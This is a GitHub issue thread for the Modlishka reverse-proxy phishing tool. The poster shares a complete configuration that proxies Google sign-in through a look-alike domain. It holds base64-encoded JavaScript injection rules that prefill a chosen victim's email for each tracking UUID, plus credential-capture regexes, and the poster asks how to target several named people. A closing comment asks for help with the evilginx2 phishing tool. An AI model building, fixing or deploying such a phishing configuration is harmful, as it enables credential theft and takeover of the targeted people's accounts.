### ISSUE TITLE
Using JSRules to Prefill Different Emails Based on UUID

### ISSUE THREAD

**Issue by stackerofwheat** [drk1wi/Modlishka#148]
Hello, 

Using Google config I have figured out how to use JSrules to prefill a single email for base domain. See below: 

"jsRules":"google.phishing.com:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAiZW1haWwxQGdtYWlsLmNvbSI7CiAgICAgICAgICBuZXh0QnV0dG9uID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImlkZW50aWZpZXJOZXh0IikKICAgICAgICAgIG5leHRCdXR0b24uY2xpY2soKQogICAgICAgICAgcmV0dXJuOwogICAgICAgIH0KICAgICAgICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7bHAoKTt9LCAxMDApOwogICAgICB9CiAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7",

However, now what I want to do is inject johnsmith@gmail.com if UUID1 is used, bobjones@gmail.com if UUID2 is used, and mikebrown@gmail.com if UUID3 is used. I tried configuring "JSrules" like so: 

"jsRules": "google.phishing.com/?ident=UUID1:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAiam9obnNtaXRoQGdtYWlsLmNvbSI7CiAgICAgICAgICBuZXh0QnV0dG9uID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImlkZW50aWZpZXJOZXh0IikKICAgICAgICAgIG5leHRCdXR0b24uY2xpY2soKQogICAgICAgICAgcmV0dXJuOwogICAgICAgIH0KICAgICAgICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7bHAoKTt9LCAxMDApOwogICAgICB9CiAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7, google.phishing.com/?ident=UUID2:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAiYm9iam9uZXNAZ21haWwuY29tIjsKICAgICAgICAgIG5leHRCdXR0b24gPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaWRlbnRpZmllck5leHQiKQogICAgICAgICAgbmV4dEJ1dHRvbi5jbGljaygpCiAgICAgICAgICByZXR1cm47CiAgICAgICAgfQogICAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7CiAgICAgIH0KICAgICAgc2V0VGltZW91dChmdW5jdGlvbigpe2xwKCk7fSwgMTAwKTs=,google.phishing.com/?ident=UUID3:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAibWlrZWJyb3duQGdtYWlsLmNvbSI7CiAgICAgICAgICBuZXh0QnV0dG9uID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImlkZW50aWZpZXJOZXh0IikKICAgICAgICAgIG5leHRCdXR0b24uY2xpY2soKQogICAgICAgICAgcmV0dXJuOwogICAgICAgIH0KICAgICAgICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7bHAoKTt9LCAxMDApOwogICAgICB9CiAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7",

It seems like the JSRules no longer work once I include a path with the UUID. Is there way to get this working how I want? Here is whole config: 

{
  "proxyDomain": "google.phishing.com",
  "listeningAddress": "127.0.0.1",
  "proxyAddress": "",
  "target": "google.com",
  "targetResources": "content.googleapis.com,www.gstatic.com,ssl.gstatic.com,ogs.google.com,accounts.google.com,drive.google.com,clients1.google.com,clients2.google.com,clients3.google.com,clients4.google.com,clients5.google.com,clients6.google.com",
  "targetRules": "",
  "terminateTriggers": "myaccount.google.phishing.com",
  "terminateRedirectUrl": "https://mail.google.com",
  "trackingCookie": "ident",
  "trackingParam": "ident",
  "jsRules": "google.phishing.com/?ident=UUID1:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAiam9obnNtaXRoQGdtYWlsLmNvbSI7CiAgICAgICAgICBuZXh0QnV0dG9uID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImlkZW50aWZpZXJOZXh0IikKICAgICAgICAgIG5leHRCdXR0b24uY2xpY2soKQogICAgICAgICAgcmV0dXJuOwogICAgICAgIH0KICAgICAgICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7bHAoKTt9LCAxMDApOwogICAgICB9CiAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7, google.phishing.com/?ident=UUID2:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAiYm9iam9uZXNAZ21haWwuY29tIjsKICAgICAgICAgIG5leHRCdXR0b24gPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaWRlbnRpZmllck5leHQiKQogICAgICAgICAgbmV4dEJ1dHRvbi5jbGljaygpCiAgICAgICAgICByZXR1cm47CiAgICAgICAgfQogICAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7CiAgICAgIH0KICAgICAgc2V0VGltZW91dChmdW5jdGlvbigpe2xwKCk7fSwgMTAwKTs=,google.phishing.com/?ident=UUID3:IGZ1bmN0aW9uIGxwKCl7IAogICAgICAgIHZhciBlbWFpbCA9IGRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIiNpZGVudGlmaWVySWQiKTsKICAgICAgICBpZiAoZW1haWwgIT0gbnVsbCkgewogICAgICAgICAgZW1haWwudmFsdWUgPSAibWlrZWJyb3duQGdtYWlsLmNvbSI7CiAgICAgICAgICBuZXh0QnV0dG9uID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImlkZW50aWZpZXJOZXh0IikKICAgICAgICAgIG5leHRCdXR0b24uY2xpY2soKQogICAgICAgICAgcmV0dXJuOwogICAgICAgIH0KICAgICAgICBzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7bHAoKTt9LCAxMDApOwogICAgICB9CiAgICAgIHNldFRpbWVvdXQoZnVuY3Rpb24oKXtscCgpO30sIDEwMCk7",
  "jsReflectParam": "reflect",
  "debug": true,
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "google.log",
  "plugins": "all",
  "credParams": "dHJ1ZVxdLCIoKD86XHcrW1wuXC1cX10pezAsfVx3KykiXQ==,XGJudWxsLFxbIihbYS16QS1aMC05IiEiIyQlJicoKSorLC0uLzo7PD0+P0BeX2B7fH1+XSspIixudWxsXGI=",
  "cert": "",
  "certKey": "",
  "certPool": ""
}

**Comment by devilspartner** [comment]
@stackerofwheat  hello sir can you help me with this error https://github.com/kgretzky/evilginx2/issues/421
